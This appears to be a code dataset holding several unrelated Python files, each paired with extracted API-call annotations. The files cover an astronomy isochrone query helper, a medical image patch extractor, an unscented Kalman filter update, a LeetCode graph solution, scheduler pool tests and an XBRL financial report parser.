['model=14,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.320','P04','P04O1D1E1Y320']]
    # model numbering follows the grids above: 01-04 (solar-scaled) and 11-14 (alpha-enhanced)
    dict_model={'01':list_model[0],'02':list_model[1],'03':list_model[2],'04':list_model[3],'11':list_model[4],'12':list_model[5],'13':list_model[6],'14':list_model[7]}
return dict_model[model]
def _query(model='01',FeH=0.0,age=1e6,photometry='HR'):
curr=_select_model(model)
age=str(age/1e6)
url='http://basti-iac.oa-abruzzo.inaf.it/cgi-bin/isoc-get.py?alpha='+curr[1]+'&grid='+curr[2]+'&metal=None&imetal=&imetalh='+str(FeH)+'&iage='+str(age)+'&bcsel='+str(photometry)
return url
def _check_age(website):
fname = re.compile(': age.*').findall(website)[0].replace('</h2>',"").split('--')
# min_age=float(re.sub('\D', '', fname[0]))*1e6
# max_age=float(re.sub('\D', '', fname[1]))*1e6
    min_age=float(re.findall(r'\d*\.?\d+',fname[0])[0])*1e6
    max_age=float(re.findall(r'\d*\.?\d+',fname[1])[0])*1e6
return min_age,max_age
def print_model():
for i in range(len(list_model)):
print(list_model[i][0])
def print_photometric_system():
'''
"HR":HR diagram\n
"2MASS":2MASS\n
"DECAM":DECam\n
"Euclid":Euclid (VIS+NISP)\n
"GAIA-DR1":GAIA DR1\n
"GAIA-DR2":GAIA DR2\n
"GAIA-DR3":GAIA DR3\n
"GALEX":GALEX\n
"Tycho":Hipparcos+Tycho\n
"WFPC2":HST (WFPC2)\n
"ACS":HST (ACS)\n
"WFC3":HST (WFC3)\n
"JPLUS":JPLUS\n
"JohnsonCousins":JohnsonCousins\n
"JWST_NIRCam":JWST (NIRCam)\n
"JWST_NIRISS":JWST (NIRISS)\n
"Kepler":Kepler\n
"PanSTARSS1":PanSTARSS1\n
"SAGE":SAGE\n
"SkyMapper":SkyMapper\n
"Sloan":Sloan\n
"Spitzer_IRAC":Spitzer (IRAC)\n:
"Stromgren":Strömgren\n
"Subaru_HSC":Subaru (HSC)\n
"SWIFT_UVOT":SWIFT (UVOT)\n
"TESS":TESS\n
"UVIT":UVIT (FUV+NUV+VIS)\n
"LSST":<NAME> Obs. (LSST)\n
"VISTA":VISTA\n
"WFIRST":WFIRST (WFI)\n
"WISE":WISE\n
'''
print('"HR":HR diagram\n"2MASS":2MASS\n"DECAM":DECam\n"Euclid":Euclid (VIS+NISP)\n"GAIA-DR1":GAIA DR1\n"GAIA-DR2":GAIA DR2\n"GAIA-DR3":GAIA DR3\n"GALEX":GALEX\n"Tycho":Hipparcos+Tycho\n"WFPC2":HST (WFPC2)\n"ACS":HST (ACS)\n"WFC3":HST (WFC3)\n"JPLUS":JPLUS\n"JohnsonCousins":JohnsonCousins\n"JWST_NIRCam":JWST (NIRCam)\n"JWST_NIRISS":JWST (NIRISS)\n"Kepler":Kepler\n"PanSTARSS1":PanSTARSS1\n"SAGE":SAGE\n"SkyMapper":SkyMapper\n"Sloan":Sloan\n<!"Spitzer_IRAC":Spitzer (IRAC)\n:"Stromgren":Strömgren\n"Subaru_HSC":Subaru (HSC)\n"SWIFT_UVOT":SWIFT (UVOT)\n"TESS":TESS\n"UVIT":UVIT (FUV+NUV+VIS)\n"LSST":Vera C. Rubin Obs. (LSST)\n"VISTA":VISTA\n"WFIRST":WFIRST (WFI)\n"WISE":WISE\n')
|
[
"io.BytesIO",
"re.findall",
"tarfile.open",
"urllib2.urlopen",
"astropy.table.Table.read",
"re.compile"
] |
[((4172, 4181), 'io.BytesIO', 'BytesIO', ([], {}), '()\n', (4179, 4181), False, 'from io import BytesIO\n'), ((4379, 4421), 'tarfile.open', 'tarfile.open', ([], {'fileobj': 'tmpfile', 'mode': '"""r:gz"""'}), "(fileobj=tmpfile, mode='r:gz')\n", (4391, 4421), False, 'import tarfile\n'), ((5021, 5067), 'astropy.table.Table.read', 'Table.read', (['text'], {'format': '"""ascii"""', 'names': 'header'}), "(text, format='ascii', names=header)\n", (5031, 5067), False, 'from astropy.table import Table\n'), ((3770, 3782), 'urllib2.urlopen', 'urlopen', (['url'], {}), '(url)\n', (3777, 3782), False, 'from urllib2 import urlopen\n'), ((7527, 7563), 're.findall', 're.findall', (['"""\\\\d*\\\\.?\\\\d+"""', 'fname[0]'], {}), "('\\\\d*\\\\.?\\\\d+', fname[0])\n", (7537, 7563), False, 'import re\n'), ((7586, 7622), 're.findall', 're.findall', (['"""\\\\d*\\\\.?\\\\d+"""', 'fname[1]'], {}), "('\\\\d*\\\\.?\\\\d+', fname[1])\n", (7596, 7622), False, 'import re\n'), ((3819, 3842), 're.compile', 're.compile', (['"""href=".*z"""'], {}), '(\'href=".*z\')\n', (3829, 3842), False, 'import re\n'), ((7332, 7353), 're.compile', 're.compile', (['""": age.*"""'], {}), "(': age.*')\n", (7342, 7353), False, 'import re\n')]
|
#!/usr/bin/env python
import os
import time
import traceback
from argparse import ArgumentParser
from glob import glob
import numpy as np
import tensorflow as tf
from scipy.misc import imread, imsave
from utils import (get_hand_segmentation_for_image, get_combined_segmentation_for_image,
get_patho_segmentation_for_image, hand_subdir, image_subdir, data_subdirs,
patho_subdir, combined_subdir)
def parse_arguments():
parser = ArgumentParser()
parser.add_argument("--output-dir", required=True, type=str,
help="Target directory to store the patches in")
parser.add_argument("--data-dir", type=str, default="training-data",
help="Input directory from where to load images")
parser.add_argument("--size", type=int, default=256,
help="Size of the square patches in pixels")
parser.add_argument("--step-size", type=float, default=0.5,
help="Step size to use when looking for patches as a percentage of the patch size")
parser.add_argument("--min-hand", type=float, default=1.0,
help="Minimum percentage of hand pixels")
parser.add_argument("--max-hand", type=float, default=1.0,
help="Maximum percentage of hand pixels")
parser.add_argument("--min-patho", type=float, default=0.0,
help="Minimum percentage of pathology pixels")
parser.add_argument("--max-patho", type=float, default=1.0,
help="Maximum percentage of pathology pixels")
parser.add_argument("--match-pattern", type=str, default=None,
help="Specify pattern for files to match")
parser.add_argument("--verify", action="store_true",
help="Verify data integrity if specified")
return parser.parse_args()
def verify_data_integrity(image_dir, hand_dir, patho_dir, combined_dir):
# count images in the directories
images_count = len(glob("{}/*.png".format(image_dir)))
hand_count = len(glob("{}/*.png".format(hand_dir)))
patho_count = len(glob("{}/*.png".format(patho_dir)))
combined_count = len(glob("{}/*.png".format(combined_dir)))
tf.logging.info("Image file counts: {}/{}/{}/{} (images/hand/patho/combined)".format(
images_count, hand_count, patho_count, combined_count))
assert images_count == hand_count and images_count == patho_count and images_count == combined_count
# check file names
for file_name in glob("{}/*.png".format(image_dir)):
assert os.path.isfile(get_hand_segmentation_for_image(file_name, hand_dir))
assert os.path.isfile(get_patho_segmentation_for_image(file_name, patho_dir))
assert os.path.isfile(get_combined_segmentation_for_image(file_name, combined_dir))
tf.logging.info("There seems to be exactly one hand, pathology, and combined segmentation per image")
def add_patch_to_file_name(file_name, patch_number):
assert patch_number < 1e5
return "{}_patch_{:04d}.png".format(os.path.splitext(file_name)[0], patch_number)
def find_patches_in_file(image_file, hand_dir, patho_dir, combined_dir, output_dir, args):
# pylint: disable=too-many-locals
patch_size = args.size
patch_step = int(args.size * args.step_size)
min_hand = int(patch_size * patch_size * args.min_hand)
max_hand = int(patch_size * patch_size * args.max_hand)
min_patho = int(patch_size * patch_size * args.min_patho)
max_patho = int(patch_size * patch_size * args.max_patho)
image_filename = os.path.basename(image_file)
image = imread(image_file)
hand_file = get_hand_segmentation_for_image(image_file, hand_dir)
hand_filename = os.path.basename(hand_file)
hand = imread(hand_file)
patho_file = get_patho_segmentation_for_image(image_file, patho_dir)
patho = imread(patho_file)
patho_filename = os.path.basename(patho_file)
combined_file = get_combined_segmentation_for_image(image_file, combined_dir)
combined = imread(combined_file)
combined_filename = os.path.basename(combined_file)
partial_patch_count = 0
non_hand_patch_count = 0
non_patho_patch_count = 0
found_patch_count = 0
for i in range(0, image.shape[0], patch_step):
for j in range(0, image.shape[1], patch_step):
hand_patch = hand[i:i+patch_size, j:j+patch_size]
if hand_patch.shape != (patch_size, patch_size):
# ignore partial patches
partial_patch_count += 1
continue
if np.count_nonzero(hand_patch) < min_hand or np.count_nonzero(hand_patch) > max_hand:
# ignore patches that have too few/much hand
non_hand_patch_count += 1
continue
patho_patch = patho[i:i+patch_size, j:j+patch_size]
if np.count_nonzero(patho_patch) < min_patho or np.count_nonzero(patho_patch) > max_patho:
# ignore patches that have too few/much patho
non_patho_patch_count += 1
continue
# save patches
image_patch = image[i:i+patch_size, j:j+patch_size]
combined_patch = combined[i:i+patch_size, j:j+patch_size]
imsave("{}/{}/{}".format(output_dir, image_subdir, add_patch_to_file_name(image_filename, found_patch_count)), image_patch)
imsave("{}/{}/{}".format(output_dir, hand_subdir, add_patch_to_file_name(hand_filename, found_patch_count)), hand_patch)
imsave("{}/{}/{}".format(output_dir, patho_subdir, add_patch_to_file_name(patho_filename, found_patch_count)), patho_patch)
imsave("{}/{}/{}".format(output_dir, combined_subdir, add_patch_to_file_name(combined_filename, found_patch_count)), combined_patch)
found_patch_count += 1
tf.logging.info("Found {} patches and ignored {}/{}/{} (bad-hand/bad-patho/partial) in file '{}'".format(
found_patch_count, non_hand_patch_count, non_patho_patch_count, partial_patch_count, image_filename))
return found_patch_count
def main():
# handle arguments and config
args = parse_arguments()
tf.logging.info("Args: {}".format(args))
data_dir = os.path.join("data", args.data_dir)
image_dir = os.path.join(data_dir, image_subdir)
hand_dir = os.path.join(data_dir, hand_subdir)
patho_dir = os.path.join(data_dir, patho_subdir)
combined_dir = os.path.join(data_dir, combined_subdir)
if args.verify:
verify_data_integrity(image_dir, hand_dir, patho_dir, combined_dir)
for sub_dir in data_subdirs:
assert not os.path.exists(os.path.join(args.output_dir, sub_dir)), \
"Output directory '{}' exists already, select another!".format(args.output_dir)
os.makedirs(os.path.join(args.output_dir, sub_dir))
found_patch_count = 0
processed_image_count = 0
for image_file in glob("{}/*{}.png".format(image_dir, args.match_pattern + "*" if args.match_pattern else "")):
found_patch_count += find_patches_in_file(image_file, hand_dir, patho_dir, combined_dir, args.output_dir, args)
processed_image_count += 1
tf.logging.info("Found {} patches in {} images".format(found_patch_count, processed_image_count))
if __name__ == "__main__":
START_TIME = time.time()
tf.logging.set_verbosity(tf.logging.INFO)
try:
main()
except Exception as ex:
tf.logging.fatal("Exception occurred: {}".format(traceback.format_exc()))
finally:
tf.logging.info("Finished execution after {:.1f}m".format((time.time() - START_TIME) / 60))
|
[
"utils.get_patho_segmentation_for_image",
"utils.get_combined_segmentation_for_image",
"numpy.count_nonzero",
"argparse.ArgumentParser",
"tensorflow.logging.info",
"os.path.basename",
"tensorflow.logging.set_verbosity",
"time.time",
"utils.get_hand_segmentation_for_image",
"os.path.splitext",
"traceback.format_exc",
"os.path.join",
"scipy.misc.imread"
] |
[((471, 487), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (485, 487), False, 'from argparse import ArgumentParser\n'), ((2610, 2721), 'tensorflow.logging.info', 'tf.logging.info', (['"""There seems to be exactly one hand, pathology, and combined segmentation per image"""'], {}), "(\n    'There seems to be exactly one hand, pathology, and combined segmentation per image'\n    )\n", (2625, 2721), True, 'import tensorflow as tf\n'), ((3334, 3362), 'os.path.basename', 'os.path.basename', (['image_file'], {}), '(image_file)\n', (3350, 3362), False, 'import os\n'), ((3373, 3391), 'scipy.misc.imread', 'imread', (['image_file'], {}), '(image_file)\n', (3379, 3391), False, 'from scipy.misc import imread, imsave\n'), ((3406, 3459), 'utils.get_hand_segmentation_for_image', 'get_hand_segmentation_for_image', (['image_file', 'hand_dir'], {}), '(image_file, hand_dir)\n', (3437, 3459), False, 'from utils import get_hand_segmentation_for_image, get_combined_segmentation_for_image, get_patho_segmentation_for_image, hand_subdir, image_subdir, data_subdirs, patho_subdir, combined_subdir\n'), ((3478, 3505), 'os.path.basename', 'os.path.basename', (['hand_file'], {}), '(hand_file)\n', (3494, 3505), False, 'import os\n'), ((3515, 3532), 'scipy.misc.imread', 'imread', (['hand_file'], {}), '(hand_file)\n', (3521, 3532), False, 'from scipy.misc import imread, imsave\n'), ((3548, 3603), 'utils.get_patho_segmentation_for_image', 'get_patho_segmentation_for_image', (['image_file', 'patho_dir'], {}), '(image_file, patho_dir)\n', (3580, 3603), False, 'from utils import get_hand_segmentation_for_image, get_combined_segmentation_for_image, get_patho_segmentation_for_image, hand_subdir, image_subdir, data_subdirs, patho_subdir, combined_subdir\n'), ((3614, 3632), 'scipy.misc.imread', 'imread', (['patho_file'], {}), '(patho_file)\n', (3620, 3632), False, 'from scipy.misc import imread, imsave\n'), ((3652, 3680), 'os.path.basename', 'os.path.basename', (['patho_file'], {}), '(patho_file)\n', (3668, 3680), False, 'import os\n'), ((3699, 3760), 'utils.get_combined_segmentation_for_image', 'get_combined_segmentation_for_image', (['image_file', 'combined_dir'], {}), '(image_file, combined_dir)\n', (3734, 3760), False, 'from utils import get_hand_segmentation_for_image, get_combined_segmentation_for_image, get_patho_segmentation_for_image, hand_subdir, image_subdir, data_subdirs, patho_subdir, combined_subdir\n'), ((3774, 3795), 'scipy.misc.imread', 'imread', (['combined_file'], {}), '(combined_file)\n', (3780, 3795), False, 'from scipy.misc import imread, imsave\n'), ((3818, 3849), 'os.path.basename', 'os.path.basename', (['combined_file'], {}), '(combined_file)\n', (3834, 3849), False, 'import os\n'), ((5781, 5816), 'os.path.join', 'os.path.join', (['"""data"""', 'args.data_dir'], {}), "('data', args.data_dir)\n", (5793, 5816), False, 'import os\n'), ((5831, 5867), 'os.path.join', 'os.path.join', (['data_dir', 'image_subdir'], {}), '(data_dir, image_subdir)\n', (5843, 5867), False, 'import os\n'), ((5881, 5916), 'os.path.join', 'os.path.join', (['data_dir', 'hand_subdir'], {}), '(data_dir, hand_subdir)\n', (5893, 5916), False, 'import os\n'), ((5931, 5967), 'os.path.join', 'os.path.join', (['data_dir', 'patho_subdir'], {}), '(data_dir, patho_subdir)\n', (5943, 5967), False, 'import os\n'), ((5985, 6024), 'os.path.join', 'os.path.join', (['data_dir', 'combined_subdir'], {}), '(data_dir, combined_subdir)\n', (5997, 6024), False, 'import os\n'), ((6824, 6835), 'time.time', 'time.time', ([], {}), '()\n', (6833, 6835), False, 'import time\n'), ((6838, 6879), 'tensorflow.logging.set_verbosity', 'tf.logging.set_verbosity', (['tf.logging.INFO'], {}), '(tf.logging.INFO)\n', (6862, 6879), True, 'import tensorflow as tf\n'), ((2383, 2435), 'utils.get_hand_segmentation_for_image', 'get_hand_segmentation_for_image', (['file_name', 'hand_dir'], {}), '(file_name, hand_dir)\n', (2414, 2435), False, 'from utils import get_hand_segmentation_for_image, get_combined_segmentation_for_image, get_patho_segmentation_for_image, hand_subdir, image_subdir, data_subdirs, patho_subdir, combined_subdir\n'), ((2463, 2517), 'utils.get_patho_segmentation_for_image', 'get_patho_segmentation_for_image', (['file_name', 'patho_dir'], {}), '(file_name, patho_dir)\n', (2495, 2517), False, 'from utils import get_hand_segmentation_for_image, get_combined_segmentation_for_image, get_patho_segmentation_for_image, hand_subdir, image_subdir, data_subdirs, patho_subdir, combined_subdir\n'), ((2545, 2605), 'utils.get_combined_segmentation_for_image', 'get_combined_segmentation_for_image', (['file_name', 'combined_dir'], {}), '(file_name, combined_dir)\n', (2580, 2605), False, 'from utils import get_hand_segmentation_for_image, get_combined_segmentation_for_image, get_patho_segmentation_for_image, hand_subdir, image_subdir, data_subdirs, patho_subdir, combined_subdir\n'), ((2832, 2859), 'os.path.splitext', 'os.path.splitext', (['file_name'], {}), '(file_name)\n', (2848, 2859), False, 'import os\n'), ((6325, 6363), 'os.path.join', 'os.path.join', (['args.output_dir', 'sub_dir'], {}), '(args.output_dir, sub_dir)\n', (6337, 6363), False, 'import os\n'), ((6178, 6216), 'os.path.join', 'os.path.join', (['args.output_dir', 'sub_dir'], {}), '(args.output_dir, sub_dir)\n', (6190, 6216), False, 'import os\n'), ((4261, 4289), 'numpy.count_nonzero', 'np.count_nonzero', (['hand_patch'], {}), '(hand_patch)\n', (4277, 4289), True, 'import numpy as np\n'), ((4304, 4332), 'numpy.count_nonzero', 'np.count_nonzero', (['hand_patch'], {}), '(hand_patch)\n', (4320, 4332), True, 'import numpy as np\n'), ((4517, 4546), 'numpy.count_nonzero', 'np.count_nonzero', (['patho_patch'], {}), '(patho_patch)\n', (4533, 4546), True, 'import numpy as np\n'), ((4562, 4591), 'numpy.count_nonzero', 'np.count_nonzero', (['patho_patch'], {}), '(patho_patch)\n', (4578, 4591), True, 'import numpy as np\n'), ((6977, 6999), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (6997, 6999), False, 'import traceback\n'), ((7076, 7087), 'time.time', 'time.time', ([], {}), '()\n', (7085, 7087), False, 'import time\n')]
|
import sys
if(sys.version_info >= (3, 8)):
from importlib.metadata import version
else:
from importlib_metadata import version
__version__ = version(__package__)
from .captcha9kw import api9kw, CaptchaError
__all__ = ["api9kw", "CaptchaError"]
|
[
"importlib_metadata.version"
] |
[((150, 170), 'importlib_metadata.version', 'version', (['__package__'], {}), '(__package__)\n', (157, 170), False, 'from importlib_metadata import version\n')]
|
import numpy as np
from numpy.linalg import inv
def ukfupdate(xsigmapts, ysigmapts, yobs, sigw):
"""Provides Updated mean and covariance.
:param xsigmapts: prior state sigma points.
:param ysigmapts: measurement generated by prior state sigma points.
:param yobs: actual measurement.
:param sigw: sigma point weights.
:return: updatedata.
"""
    # Calculating the mean of xsigmapts (sigma points are stored column-wise, so average over axis 1)
    xm = xsigmapts.mean(1)
    # Calculating the mean of ysigmapts
    ym = ysigmapts.mean(1)
# Calculating pxx
l1 = np.shape(xsigmapts)[0]
pxx = np.zeros((l1, l1))
pyy = np.zeros((l1, l1))
pxy = np.zeros((l1, l1))
    # If an error happens here, check the dimension of the state space and the number of sigma points.
    # The sigma-point deviations are 1-D slices, so np.outer (not np.matmul, which would
    # yield a scalar inner product) is needed to form the rank-one covariance terms.
    for i in range(0, 2*l1):
        pxx = pxx + sigw.wc[i]*np.outer(xsigmapts[:, i]-xm, xsigmapts[:, i]-xm)
        pyy = pyy + sigw.wc[i]*np.outer(ysigmapts[:, i]-ym, ysigmapts[:, i]-ym)
        pxy = pxy + sigw.wc[i]*np.outer(xsigmapts[:, i]-xm, ysigmapts[:, i]-ym)
K = np.matmul(pxy, inv(pyy))
xmpost = xm + np.matmul(K, (yobs-ym))
xcpost = pxx - np.matmul(np.matmul(K, pyy), K.transpose())
updatedata = {"xmpost": xmpost, "xcpost": xcpost}
return updatedata
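# A minimal usage sketch (added; not from the original module). Sigma points are
# stored column-wise (n states x 2n points); SimpleNamespace stands in for the
# caller's weight container, and the equal cubature weights 1/(2n) are an
# assumption made for this example only.
if __name__ == "__main__":
    from types import SimpleNamespace
    n = 2
    xsig = np.random.randn(n, 2 * n)                # prior state sigma points
    ysig = xsig + 0.1 * np.random.randn(n, 2 * n)  # simulated measurement sigma points
    w = SimpleNamespace(wc=[1.0 / (2 * n)] * (2 * n))
    out = ukfupdate(xsig, ysig, np.zeros(n), w)
    print(out["xmpost"].shape, out["xcpost"].shape)  # (2,) (2, 2)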
|
[
"numpy.shape",
"numpy.linalg.inv",
"numpy.zeros",
"numpy.matmul"
] |
[((572, 590), 'numpy.zeros', 'np.zeros', (['(l1, l1)'], {}), '((l1, l1))\n', (580, 590), True, 'import numpy as np\n'), ((601, 619), 'numpy.zeros', 'np.zeros', (['(l1, l1)'], {}), '((l1, l1))\n', (609, 619), True, 'import numpy as np\n'), ((630, 648), 'numpy.zeros', 'np.zeros', (['(l1, l1)'], {}), '((l1, l1))\n', (638, 648), True, 'import numpy as np\n'), ((539, 558), 'numpy.shape', 'np.shape', (['xsigmapts'], {}), '(xsigmapts)\n', (547, 558), True, 'import numpy as np\n'), ((1080, 1088), 'numpy.linalg.inv', 'inv', (['pyy'], {}), '(pyy)\n', (1083, 1088), False, 'from numpy.linalg import inv\n'), ((1108, 1131), 'numpy.matmul', 'np.matmul', (['K', '(yobs - ym)'], {}), '(K, yobs - ym)\n', (1117, 1131), True, 'import numpy as np\n'), ((1161, 1178), 'numpy.matmul', 'np.matmul', (['K', 'pyy'], {}), '(K, pyy)\n', (1170, 1178), True, 'import numpy as np\n')]
|
"""
Question Source: https://leetcode.com/problems/find-the-town-judge/
Level: Easy
Topic: Graph
Solver: Tayyrov
Date: 03.01.2022
"""
from collections import defaultdict
def findJudge_solution1(trust, n) -> int:
trustees = defaultdict(set) # as the values are unique list as a value type can be used too
trusters = set() # these can not be a judge
for person, judge in trust:
trustees[judge].add(person)
trusters.add(person)
for key, val in trustees.items():
if key not in trusters and len(val) == n - 1: # contains all except itself
            return key  # Logically only one person can be trusted by the other n - 1 people while
            # trusting nobody, so we can return as soon as we find one.
    # edge case: a single person with an empty trust list is trivially the judge
    # (everyone except themselves -- i.e. nobody -- needs to trust them)
if n == 1 and trust == []:
return 1
return -1
# alternative solution using counting
def findJudge_solution2(trust, n) -> int:
    frequency_table = [0] * n
for trusting, being_trusted in trust:
frequency_table[trusting - 1] -= 1
frequency_table[being_trusted - 1] += 1
for idx in range(n):
        if frequency_table[idx] == n - 1:  # if someone trusts anyone, their score drops below N-1,
            # since each outgoing trust counts -1; similarly, if someone doesn't trust the candidate,
            # the candidate cannot reach N-1 (the maximum is N-1, not N, because the judge doesn't trust himself)
return idx + 1
return -1
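# Quick self-check against the LeetCode examples (added for illustration):
if __name__ == "__main__":
    assert findJudge_solution1([[1, 3], [2, 3]], 3) == 3
    assert findJudge_solution2([[1, 3], [2, 3]], 3) == 3
    assert findJudge_solution2([[1, 3], [2, 3], [3, 1]], 3) == -1
    assert findJudge_solution1([], 1) == 1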
|
[
"collections.defaultdict"
] |
[((240, 256), 'collections.defaultdict', 'defaultdict', (['set'], {}), '(set)\n', (251, 256), False, 'from collections import defaultdict\n')]
|
from containers import Databases
from file import load_databases_from_file as load
load()
print(Databases.databases)
|
[
"file.load_databases_from_file"
] |
[((83, 89), 'file.load_databases_from_file', 'load', ([], {}), '()\n', (87, 89), True, 'from file import load_databases_from_file as load\n')]
|
import pytest
from pexen.sched import TaskRes
from pexen.sched.pool import PoolError
from tests.sched.common import *
from tests.sched.common import check_resources
@parametrize_pool_both()
def test_pool_reuse(pool):
dummy1 = create_dummy('dummy1')
dummy2 = create_dummy('dummy2')
p = pool()
p.register([dummy1])
p.start()
p.submit(dummy1)
p.shutdown(wait=True)
assert not p.empty()
assert not p.alive()
res = list(p.iter_results()) # also tests results-after-shutdown
assert p.empty()
assert res == [TaskRes(dummy1)]
p.register([dummy2])
p.start()
p.submit(dummy1)
p.submit(dummy2)
p.shutdown(wait=True)
assert not p.empty()
assert not p.alive()
res = list(p.iter_results()) # also tests results-after-shutdown
assert p.empty()
assert TaskRes(dummy1) in res
assert TaskRes(dummy2) in res
@parametrize_pool_both()
def test_shutdown_without_gather(pool):
dummy1 = create_dummy('dummy1')
p = pool()
p.register([dummy1])
p.start()
p.submit(dummy1)
p.shutdown(wait=True)
@parametrize_pool_thread()
def test_onthefly_thread(pool):
dummy1 = create_dummy('dummy1')
dummy2 = create_dummy('dummy2')
p = pool()
p.register([dummy1])
p.start()
p.submit(dummy1)
p.submit(dummy2)
assert p.alive()
p.shutdown()
res = list(p.iter_results())
assert not p.alive()
assert TaskRes(dummy1) in res
assert TaskRes(dummy2) in res
@parametrize_pool_process()
def test_onthefly_process(pool):
dummy1 = create_dummy('dummy1')
dummy2 = create_dummy('dummy2')
p = pool()
p.register([dummy1])
p.start()
with pytest.raises(PoolError) as exc:
p.register([dummy2])
assert "Cannot register tasks while the pool is running" in str(exc.value)
p.submit(dummy1)
with pytest.raises(PoolError) as exc:
p.submit(dummy2)
assert "Cannot submit unregistered task" in str(exc.value)
assert p.alive()
p.shutdown()
res = list(p.iter_results())
assert not p.alive()
assert TaskRes(dummy1) in res
@parametrize_pool_thread()
def test_submit_tail(pool):
dummy1 = create_dummy('dummy1')
dummy2 = create_dummy('dummy2')
p = pool()
p.register([dummy1,dummy2])
p.start()
p.submit(dummy1)
res = p.iter_results()
assert TaskRes(dummy1) == next(res)
p.submit(dummy2)
assert TaskRes(dummy2) == next(res)
p.shutdown()
with pytest.raises(StopIteration):
next(res)
|
[
"pytest.raises",
"pexen.sched.TaskRes"
] |
[((829, 844), 'pexen.sched.TaskRes', 'TaskRes', (['dummy1'], {}), '(dummy1)\n', (836, 844), False, 'from pexen.sched import TaskRes\n'), ((863, 878), 'pexen.sched.TaskRes', 'TaskRes', (['dummy2'], {}), '(dummy2)\n', (870, 878), False, 'from pexen.sched import TaskRes\n'), ((1424, 1439), 'pexen.sched.TaskRes', 'TaskRes', (['dummy1'], {}), '(dummy1)\n', (1431, 1439), False, 'from pexen.sched import TaskRes\n'), ((1458, 1473), 'pexen.sched.TaskRes', 'TaskRes', (['dummy2'], {}), '(dummy2)\n', (1465, 1473), False, 'from pexen.sched import TaskRes\n'), ((1678, 1702), 'pytest.raises', 'pytest.raises', (['PoolError'], {}), '(PoolError)\n', (1691, 1702), False, 'import pytest\n'), ((1849, 1873), 'pytest.raises', 'pytest.raises', (['PoolError'], {}), '(PoolError)\n', (1862, 1873), False, 'import pytest\n'), ((2077, 2092), 'pexen.sched.TaskRes', 'TaskRes', (['dummy1'], {}), '(dummy1)\n', (2084, 2092), False, 'from pexen.sched import TaskRes\n'), ((2348, 2363), 'pexen.sched.TaskRes', 'TaskRes', (['dummy1'], {}), '(dummy1)\n', (2355, 2363), False, 'from pexen.sched import TaskRes\n'), ((2409, 2424), 'pexen.sched.TaskRes', 'TaskRes', (['dummy2'], {}), '(dummy2)\n', (2416, 2424), False, 'from pexen.sched import TaskRes\n'), ((2464, 2492), 'pytest.raises', 'pytest.raises', (['StopIteration'], {}), '(StopIteration)\n', (2477, 2492), False, 'import pytest\n'), ((553, 568), 'pexen.sched.TaskRes', 'TaskRes', (['dummy1'], {}), '(dummy1)\n', (560, 568), False, 'from pexen.sched import TaskRes\n')]
|
#! /usr/bin/env python
# encoding: utf-8
import re
from marshmallow import Schema, fields
import datetime
from collections import OrderedDict
from dataclasses import dataclass
import logging
from io import StringIO
def soup_maker(fh):
""" Takes a file handler returns BeautifulSoup"""
try:
from bs4 import BeautifulSoup
soup = BeautifulSoup(fh, "lxml")
for tag in soup.find_all():
tag.name = tag.name.lower()
except ImportError:
from BeautifulSoup import BeautifulStoneSoup
soup = BeautifulStoneSoup(fh)
return soup
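# A hedged usage sketch (added; the inline XML is a made-up fragment): soup_maker
# accepts any file-like object and lower-cases every tag name, so mixed-case
# XBRL tags become uniform before parsing.
#
#   demo = soup_maker(StringIO("<XBRL><Context id='D2020Q1'/></XBRL>"))
#   assert demo.find("context") is not None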
class XBRLFile:
def __init__(self, fh):
"""
fh should be a seekable file-like byte stream object
"""
self.headers = OrderedDict()
self.fh = fh
class XBRLException(Exception):
pass
class XBRL:
def __init__(self):
self.context_ids = {}
self.gaap_data = {}
self.dei = None
self.custom_data = None
def get_GAAP(self, context, end_date=None):
# the default is today
if end_date is None:
end_date = datetime.date.today()
elif isinstance(end_date, str):
end_date = datetime.datetime.strptime(end_date, "%Y%m%d")
        # map the named contexts onto time spans ending at end_date
if context == "quarter":
context = datetime.timedelta(days=90)
elif context == "year":
context = datetime.timedelta(days=360)
elif context == "instant":
pass
elif isinstance(context, datetime.timedelta):
pass
else:
try:
context = datetime.timedelta(days=int(context))
except (ValueError, TypeError):
raise ValueError('invalid context')
# we need start date unless instant
start_date = None
if context != "instant":
start_date = end_date - context
ctx_id = None
for cid, ctx_dates in self.context_ids.items():
if context == "instant" and len(ctx_dates) == 1 and ctx_dates[0] == end_date:
ctx_id = cid
break
elif len(ctx_dates) == 2:
found_start_date, found_end_date = ctx_dates
if (context <= (found_end_date - found_start_date) <= (context + datetime.timedelta(weeks=1))) \
and (found_end_date == end_date):
ctx_id = cid
break
if ctx_id is None:
raise Exception("no context id matched")
gaap_obj = GAAP()
for k, k_data in self.gaap_data.items():
v = k_data.get(ctx_id, 0.)
setattr(gaap_obj, k, v)
return gaap_obj
def get_quarterlies(self, field_names):
data = {x: {} for x in field_names}
ctx_ids = [x for x in self.context_ids.keys() if x.endswith("QTD")]
quarter_re = re.compile("[0-9]{4}Q[1-4]")
ctx_dict = OrderedDict([(cid, quarter_re.search(cid).group(0)) for cid in sorted(ctx_ids)])
for k in field_names:
for cid, quarter in ctx_dict.items():
data[k][quarter] = self.gaap_data[k].get(cid)
return data
def get_yearlies(self, field_names):
data = {x: {} for x in field_names}
ctx_ids = [x for x in self.context_ids.keys() if x.endswith("Q4YTD")]
year_re = re.compile("[0-9]{4}")
ctx_dict = OrderedDict([(cid, int(year_re.search(cid).group(0))) for cid in sorted(ctx_ids)])
for k in field_names:
for cid, year in ctx_dict.items():
data[k][year] = self.gaap_data[k].get(cid)
return data
@classmethod
def from_file(cls, file_handle, ignore_errors=0):
"""
        from_file is the main entry point for parsing an XBRL document. It takes
        a file handle or a file path.
"""
if ignore_errors == 2:
logging.basicConfig(filename='/tmp/xbrl.log',
level=logging.ERROR,
format='%(asctime)s %(levelname)s %(name)s %(message)s')
logger = logging.getLogger(__name__)
else:
logger = None
xbrl_obj = cls()
# if no file handle was given create our own
if not hasattr(file_handle, 'read'):
file_handler = open(file_handle)
else:
file_handler = file_handle
# Store the headers
xbrl_file = XBRLPreprocessedFile(file_handler)
xbrl = soup_maker(xbrl_file.fh)
file_handler.close()
xbrl_obj.context_ids = XBRL.parse_contexts(xbrl)
xbrl_obj.gaap_data = XBRL.parse_GAAP(xbrl, ignore_errors, logger)
xbrl_obj.dei = XBRL.parse_DEI(xbrl, ignore_errors, logger)
xbrl_obj.custom_data = XBRL.parse_custom(xbrl, ignore_errors, logger)
return xbrl_obj
@staticmethod
